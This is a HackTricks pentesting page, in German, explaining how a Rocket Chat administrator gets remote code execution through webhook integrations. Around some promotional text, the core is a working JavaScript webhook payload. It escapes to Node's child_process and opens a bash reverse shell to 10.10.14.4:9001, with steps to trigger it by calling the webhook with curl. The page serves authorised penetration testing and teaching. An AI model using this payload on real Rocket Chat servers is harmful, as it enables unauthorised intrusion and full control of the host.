hacktricks/network-services-pentesting/pentesting-web/rocket-chat.md

4.2 KiB

Rocket Chat

Erlernen Sie AWS-Hacking von Null auf Held mit htARTE (HackTricks AWS Red Team Expert)!

Andere Möglichkeiten, HackTricks zu unterstützen:

{% embed url="https://websec.nl/" %}

RCE

Wenn Sie Administrator in Rocket Chat sind, können Sie RCE erhalten.

  • Gehen Sie zu Integrations und wählen Sie Neue Integration und wählen Sie eine beliebige: Eingehender WebHook oder Ausgehender WebHook.
  • /admin/integrations/incoming
const require = console.log.constructor('return process.mainModule.require')();
const { exec } = require('child_process');
exec("bash -c 'bash -i >& /dev/tcp/10.10.14.4/9001 0>&1'")
  • Konfiguriere den WebHook (der Kanal und der Benutzername müssen vorhanden sein):
  • Konfiguriere das WebHook-Skript:
  • Speichere die Änderungen
  • Erhalte die generierte WebHook-URL:
  • Rufe sie mit curl auf und du solltest die Reverse-Shell erhalten

{% embed url="https://websec.nl/" %}

Lerne AWS-Hacking von Null auf Held mit htARTE (HackTricks AWS Red Team Expert)!

Andere Möglichkeiten, HackTricks zu unterstützen: